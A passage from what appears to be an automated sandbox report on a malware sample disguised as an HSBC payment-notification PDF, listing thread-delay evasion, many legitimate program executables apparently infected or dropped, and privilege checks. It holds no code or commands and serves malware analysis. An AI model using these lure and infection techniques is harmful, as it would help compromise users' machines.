                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595544
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595437
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595309
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595202
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595094
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594875
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594766
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594656
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594533
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594406
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594297
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594176
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594047
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593937
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593719
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593602
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593247
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 592923
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 592797
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 592682
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 592565
                  Source: C:\Windows\System32\msdtc.exe | Window / User API: threadDelayed 493
                  Source: C:\Windows\SysWOW64\perfhost.exe | Window / User API: threadDelayed 5766
                  Source: C:\Windows\SysWOW64\perfhost.exe | Window / User API: threadDelayed 4232
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 4114
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Window / User API: threadDelayed 5696
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeDropped PE file which has not been started: C:\Windows\System32\msiexec.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeDropped PE file which has not been started: C:\Windows\System32\SensorDataService.exeJump to dropped file
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeDropped PE file which has not been started: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\VSSVC.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Check user administrative privileges: GetTokenInformation (graph_11-3883)
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Check user administrative privileges: GetTokenInformation (graph_12-3659)
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe | Check user administrative privileges: GetTokenInformation (graph_14-3899)
                  Source: C:\Windows\SysWOW64\perfhost.exe | Check user administrative privileges: GetTokenInformation (graph_15-50760)
                  Source: C:\Windows\System32\Spectrum.exe | Check user administrative privileges: GetTokenInformation (graph_19-3944)
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exe | Check user administrative privileges: GetTokenInformation (graph_21-3883)
                  Source: C:\Windows\System32\AppVClient.exe | Check user administrative privileges: GetTokenInformation (graph_7-3899)
                  Source: C:\Windows\SysWOW64\perfhost.exe | API coverage: 1.7 %
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe TID: 7140 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 7120 | Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\System32\msdtc.exe TID: 5364 | Thread sleep count: 493 > 30
                  Source: C:\Windows\System32\msdtc.exe TID: 5364 | Thread sleep time: -49300s >= -30000s
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 3652 | Thread sleep count: 5766 > 30
                  Source: C:\Windows\SysWOW64\perfhost.exe TID: 3652 | Thread sleep time: -57660000s >= -30000s
